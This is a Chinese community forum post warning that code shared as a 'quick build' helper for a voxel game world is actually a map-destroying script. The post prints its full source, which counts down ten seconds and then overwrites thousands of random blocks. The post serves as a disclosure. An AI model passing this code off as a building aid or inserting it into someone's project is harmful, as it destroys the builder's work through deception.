用户:
七式草莓查看:1 回复:3 评论:1 创建时间:2022-10-22T18:12:47
今天我发现了一个速(hui)建(tu)代码帖子:shequ.codemao.cn/community/475504(里面的代码我备份了,链接:static.box3.codemao.cn/block/QmcCyLqAK9tjpAxwRjGLDkLuSwkwCCHG5kEh6GqCQ6ndNd)。经过破解,发现这是一个毁图喵(源代码在置顶回帖)
七式草莓!(async()=>{
world.say("毁图喵即将爆炸!"),
console.warn("毁图喵即将爆炸!");
for (i = 1; i <= 10; i++) {
await sleep(1000)
console.clear()
world.say('当前还剩' + (10 - i) + "秒爆炸!")
console.error("当前还剩" + (10 - i) + "秒爆炸!");
}
await sleep(1000)
console.clear()
world.say("轰~~~")
console.warn("你失败了~");
for (i = 1; i <= 10000; i++) {
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id('air'));
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id('air'));
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id('air'));
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id('leaf_01'));
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id("leaf_02"));
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id("dirt"));
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id("grass"));
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id("stone"));
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id("green_leaf"));
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id("snowland"));
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id("ice"));
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id("polar_ice"));
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id('polar_region'));
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id("rock"));
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id("water"));
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id("wooden_box"));
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id("glass"));
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id("board_01"));
voxels.setVoxel(Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), Math.floor(Math.random() * 128), voxels.id("stainless_steel"));
await sleep(1);
console.log("你熬过了输入者对你的折磨"),
world.say('毁图结束');
}
}
)()
点赞1
评论